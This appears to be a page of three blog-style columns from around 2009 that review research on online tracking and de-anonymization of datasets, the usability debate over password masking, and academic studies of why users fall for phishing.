The State of User Tracking and the Impossibility of Anonymizing Data

What we think is reasonable, commonplace, or even possible in terms of protecting or violating online privacy shifts constantly. Recent developments in tools and techniques for tracking online behavior and identifying individuals from supposedly anonymized data sets should cause us to reevaluate what is possible.

Katherine McKinley of iSEC Partners published a detailed analysis of how popular browsers and browser extensions handle cookies and other methods of local data storage used for tracking users in her December, 2008 paper Cleaning Up after Cookies (PDF). McKinley tested the ability for browsers and extensions to clear the private data as well as “private browsing” features. She found that most browsers attempted to clear previous stored private data, but often left some data accessible. She found that Adobe Flash did not attempt to remove this data and in fact stored it in such a way that it circumvented most privacy protections offered by browsers. iSEC Partners created an online version of the test used in the article to allow individuals to test their own configurations. It is available at Breadcrumbs Tracker.

The August, 2009 paper Flash Cookies and Privacy by Ashkan Soltani and Shannon Canty and Quentin Mayo and Lauren Thomas and Chris Jay Hoofnagle at UC Berkeley focuses directly on the privacy issues related to Flash Cookies. The authors survey the top 100 web sites according to QuantCast in July of 2009 and found that more than half of them used Flash cookies. The authors note that unlike standard HTTP cookies, Flash cookies do not have an expiration date and are stored in a different location on the file system that is harder to find. Most cookie management tools will not delete these type of cookies and they remain in place even when private browsing mode in enabled. The authors found that Flash cookies were frequently employed to track users that had explicitly attempted to prevent cookie tracking by using the Flash cookie to regenerate a HTTP cookie that had been deleted.

Most online services use multiple tracking services for analytics, performance monitoring, and usability analysis. A mixture of JavaScript-based tracking codes and cookies is the most common method for user tracking. The paper On the Leakage of Personally Identifiable Information Via Online Social Networks (PDF) presented at the ACM Workshop on Online Social Networks by Balachander Krishnamurthy and Craig Wills describes the techniques used by advertising firms and social networks services to track users and the types of information they release. The authors studied information leakage from twelve online social networks and found that the bulk of user information is released through HTTP headers and third-party cookies.

In his post Netflix’s Impending (But Still Avoidable) Multi-Million Dollar Privacy Blunder on the Freedom to Tinker blog, Paul Ohm discusses his 2009 publication Broken Promises of Privacy: Responding to the Surprising Failure of Anonymization in the context of the announcement for the second Netflix prize to improve the accuracy of Netflix predictions. Ohm argues that it is not possible to anonymize the data and that it is irresponsible and possibly illegal to release it. Netflix released a half a million anonymized subscriber records for analysis in the original contest. The one million dollar prize resulted in significant numbers of researchers entering the contest.

Soon after the Netflix released the records, researchers Arvind Narayanan and Vitaly Shmatikov proved they could identify individual subscribers by combining the Netflix data with other databases. Their publication Robust De-anonymization of Large Sparse Datasets (PDF) presented at the 2008 IEEE Symposium on Security and Privacy describes How to Break Anonymity of the Netflix Prize Dataset. Narayanan and Shmatikov continued their research and demonstrated de-anonymizing social networks such as Twitter in De-Anonymizing Social Networks (PDF) (paper FAQ) a paper presented at the 2009 IEEE Symposium on Security and Privacy. Ohm, reminds the readers about the scandal that occurred in 2006 when AOL researchers Greg Pass, Abdur Chowdhury, and Cayley Torgeson presented their paper A Picture of Search (PDF) at the first International Conference on Scalable Information Systems. The authors released an anonymized dataset they analyzed in the paper that included more than six hundred thousand AOL users, some individuals were subsequently individually identified.

Carnegie Mellon University professor Latanya Sweeney developed the foundation for much of the current work on de-anonymizing data sets. Her paper All the Data on All The People (only abstract is publicly available) published in 2000, showed that it was possible to identify individuals in US Census data using only a few variables. The paper argues that it is possible to identify almost 90% of the US population using only full date of birth, gender, and ZIP code.

Alessandro Acquisti and Ralph Gross (no relation) presented their research on Predicting Social Security Numbers from Public Data. The authors demonstrate that it is possible to automate the process of predicting an individual’s Social Security Number (SSN) for large portions of the population using public information. The information used to create predictions is easily harvested from social networking sites, voter registration records, and commercial databases. Aquiusti and Gross argue that we must reconsider our policies around the use of SSNs, which are commonly used for authentication and frequently abused by identity thieves.

* This article originally appeared as The State of User Tracking and the Impossibility of Anonymizing Data in my Messaging News “On Message Column.”

You should follow me on Twitter.

Trends in Password Masking Security and Usability

John Gruber’s Daring Fireball pointed me to Jakob Nielsen’s Alertbox column Stop Password Masking, which resulted in a thoughtful and interesting thread of conversations and a few experimental solutions. Password masking refers to the practice of displaying an alternate character, usually a star or a bullet in place of the actual characters typed into a password field. The idea is that this prevents another party from viewing the password while it is entered. Nielsen argues that in most cases masked passwords are not needed since should surfing is not a major issue and that this is even less of an issue on mobile devices. He says masked passed passwords often reduce usability by increasing the number of errors since users cannot see what they are typing. This problem is further compounded on mobile devices where typing is more difficult and slower. Since users are less certain about what they are typing, they are much more likely to choose passwords that are simplistic or copy and paste the passwords from less secure locations. Nielsen says that high value password forms should offer an optional checkbox for masking passwords so that they can be used on an as needed basis.

Jason Montgomery’s Response to Nielsen’s “Stop Password Masking” on the SANS Institute’s The Application Security Street Fighter Blog that provides a more nuanced commentary on the tradeoffs between security and usability for password masking. Montgomery argues that Nielsen’s points are valid and suggests that password managers, pass phrases, and two factor authentication can sidestep some the problems by increasing the security of stored passwords as well as the ease of recalling them. Earlier I reviewed, 1Password, a password manager for Mac and iPhone that I use daily.

Bruce Schneier, a respected security expert, agreed with Nielsen in his brief response, The Problem with Password Masking. His post generated a large number of comments, which caused Schneier to temper his opinion in a later article The Pros and Cons of Password Masking. Schneier concludes that even though there are significant downsides to password masking, the practice is less problematic than either not masking passwords at all or complicating the interface with an optional password masking checkbox. The second article also generated a thoughtful discussion in the comments. In Strong Web Passwords, Schneier summarizes the Usenix HotSec07 article Do Strong Web Passwords Accomplish Anything? by Florencio, Herley, and Coskun, which argues that complex passwords do little to increase security when adequate policies are in place to limit the number of password attempts. Schneier suggests that the password masking feature on BlackBerries with SureType (non-QWERTY) keyboards and the iPhone (see: iPhone 2.0 password masking) that shows the current character and masks all previous characters is a reasonable alternative.

Farhad Manjoo’s Slate Magazine column, Fix your terrible, insecure passwords in five minutes, offers a solid set of suggestions for creating better passwords and describes why this is important in light of the recent Twitter break in. Macworld’s Joe Kissell offers his own set of suggestions for creating better passwords in a series of articles listed in Top password tips

The ongoing discussion led several developers to create prototypes that demonstrate password masking techniques. Each implementation has an online demo and source code publicly available. All prototypes are currently written in jQuery.

  • Stefan Ullrich’s iPhone-like password fields using jQuery and Oliver Storm’s Mypass each implements a password masking field similar to the iPhone and BlackBerries with SureType that displays the current typed character, but masks all previous characters by replacing them with bullets.
  • Byron Rode’s showPassword is a jQuery plugin that implements a password entry field that defaults to fully masking the password with bullets, but also includes Nielsen’s proposed checkbox to display the password when requested.
  • arc90 created two experimental password masking implementations. The first, HalfMask creates a masking effect by placing translucent random characters on top of the original password characters. This allows the person entering the password to view the original, with some concentration, but makes it far more difficult for another person to casually observe the password. The second implementation, HashMask, masks the password in a standard way by replacing each character typed with a bullet, but adds a visual representation of the password in the form of a Sparklines. This way the person entering the password has a visual indication that the password is correct, although they need to remember the Sparkline.
  • Mattt Thompson’s Chroma-Hash was inspired by arc90’s HashMask and masks passwords in the standard way, but adds a visualization of the password as it is typed using colored bars generated from a hash of the password. This allows users to quickly check that the visual representation is correct before entering submit. It has the side benefit of allowing fast comparisons when password confirmations are required for entering new or changed passwords. Lee Gao created pyChroma, a Chroma-Hash implementation in Python, which has source, but unfortunately no online demo.

Finally, Kevin Vigneault describes considers several other related options in his post Confirming Passwords Is Annoying: Is There a Better Way?, which was a result of a thread on IxDA “Confirm password” field – Superfluous? that appeared several months before Nielsen’s column.

* This article originally appeared as Trends in Password Masking Security and Usability in my Messaging News “On Message Column.” Article updated July 31st, 2009 to add additional references.

You Can Fool Some of the People All of the Time: Research on Phishing

Duping users into revealing their private data goes back decades, but it wasn’t until the late-1990s that “phishing” became the word to describe the practice. Today, phishing costs banks, service providers, and consumers billions of dollars per year, and companies are working frantically to limit the damage. A survey by Gartner estimated that more than three and a half billion dollars were lost to phishing in the United States in 2007 alone.

Phishing typically refers to the process where a fraudulent, but realistic looking Web service or application is created to collect personal information such as username and password pairs, bank accounts, credit card numbers and social security numbers. These accounts are then used from everything from spamming operations to bank fraud and identity theft. In some cases the phishing sites are not even fraudulent, but the servers have been compromised or the front end is vulnerable to Cross-Site Scripting (XSS) attacks or Cross-Site Request Forgeries (CSRF/XSRF). In other cases multiple techniques are used and include viruses and malware.

With more than a billion people online, ensuring that none of them fall prey to phishers is nearly impossible. The stakes are high, so there is a tremendous amount of effort being put into preventing and mitigating phishing by industry, which has done much to stave off the problem even though the number and sophistication of attacks have rapidly increased. In addition, there is also a significant amount of academic and industrial research into phishing that has received limited exposure in the press. In this article, I will summarize several important contributions from the last few years, as well as outlets to investigate for further research. One common theme across each of these papers is the recognition that usability and design are tightly connected to the effectiveness of security implementations.

Users Too Trusting

One of the most remarkable aspects of the problem is that despite warnings, many users will fall for even basic phishing attempts. In The Emperor’s New Security Indicators *presented at the *2007 IEEE Symposium on Security and Privacy by Schechter, Dhamija, Ozment and Fischer the authors show that users will continue to enter credentials into online banking sites even when security indicators are removed and warnings are displayed. For example, of roughly half the users who completed the study using their own personal accounts, 92 percent continued to log in even after the user selected verification image was removed (offered on sites such as Bank of America, Vanguard and Yahoo!) and replaced with a note saying that the security system was currently being upgraded.

Sadly, the efforts by vendors to help users recognize phishing often fail. One paper presented at The Conference on Usability, Psychology, and Security (UPSEC ‘08) indicates the difficulties that services face when attempting to mitigate phishing attacks. In RUST: A Retargetable Usability Testbed for Website Authentication Technologies, Johnson, Atreya, Aviv, Raykova, Bellovin and Kaiser conducted work building on Schechter et al., which evaluated Microsoft CardSpace and Verisign Secure Letterhead. The authors found that even though the vendors has made explicit design choices that attempt to offer resistance to phishing, when implementing these new authentication technologies users could still be guided into a fraudulent Web site at an earlier point in the interaction. For example, most users who received an email directing them to a “secure” site would still enter their credentials if the site looked relatively convincing and they received a message saying the site was partially down for maintenance.

User Passwords

One successful phish can be applied across multiple accounts. One study, A Large-Scale Study Of Web Password Habits presented at the The 16th International Conference on World Wide Web WWW ‘07 by Dinei Florencio and Cormac Herley from Microsoft research describes findings from an experiment that collected data about account and passwords from more than a half a million Microsoft Toolbar users. It’s widely accepted that most individuals maintain a limited number of passwords compared to the number of locations that they need to enter a password. Typically, one password for sites they consider to be very secure, such as online banking, and several passwords for sites they consider less secure. Users increase the number of passwords when sites require frequent password changes or have specific restrictions on combinations of numbers, letters or punctuation characters. The problem is that in current practice large service providers are not islands. We know that individuals reuse credentials across sites and therefore likely have the same credentials at both large and small sites, meaning that each site has the potential to be the weakest link in a global authentication chain.

Florencio and Herley’s research is useful and important as it provides a large sample of user behavior surrounding passwords and account use. The authors found that the “average user has 6.5 passwords, each of which is shared across 3.9 different sites. Each user has about 25 accounts that require passwords, and types an average of eight passwords per day.” Their data showed that 0.4 percent of users type their credentials into a verified phishing sites each year and that users forget their passwords frequently, in the case of Yahoo!, about 1.5 percent of users a month. This means that the mechanisms to recover or reset passwords when users forget them are critical.

Ariel Rabkin presented Personal Knowledge Questions for Fallback Authentication: Security Questions in the Era of Facebook at The 4th Symposium on Usable Privacy and Security (SOUPS ‘08). His research examines the additional security questions typically used during the password recovery process when the user has forgotten his or her password. Rabkin evaluated the security questions from twenty banking and investment Web sites and broke them into categories of ambiguous (could have more than one answer); not memorable (user was likely to forget); inapplicable (was not relevant to the user); guessable (likely to be obvious); attackable (information available on social networks); automatically attackable (possible to harvest data and test); and secure. Only slightly more than one-third of all questions were classified as secure. This is troubling as many of the sites did not employ either CAPTCHAs, to deter simple automated attacks, or two-factor authentication, such as SMS for an additional layer of verification with the password recovery, even when they provided these mechanisms for standard authentication.

A new frontier for those who run phishing scams is in attacking the browsers on gaming and mobile devices. The number of consumer devices with full-featured browsers is growing rapidly and is not trivial. For example, in March 2009 Apple announced that it has shipped more than 30 million iPhone and iPod touch devices and Nintendo announced that it had shipped more than 100 million Nintendo DS units. Also at UPSEC ‘08, Niu, Hsu and Chen presented iPhish: Phishing Vulnerabilities on Consumer Electronics, which examined Web-browsers from three consumer devices: the Apple iPhone and two gaming devices, the Nintendo DS and Nintendo Wii. The authors conducted a study with iPhone users and found that design choices made for the limited real estate of the device made it impossible for even knowledgeable and security savvy users to adequately evaluate potential phishing sites. For example, there are no explicit anti-phishing protections built into either the mail client or the browser, (this feature is slated for delivery summer 2009), which could indicate to the user that something was amiss. In the Apple browser the URL was often abbreviated and easily faked with specialized JavaScript, while in the URL was often elided entirely by default and the SSL indicator is not available.

* This article originally appeared as You Can Fool Some of the People All of the Time: Research on Usability, Security and Phishing in the April 2009 issue of Messaging News.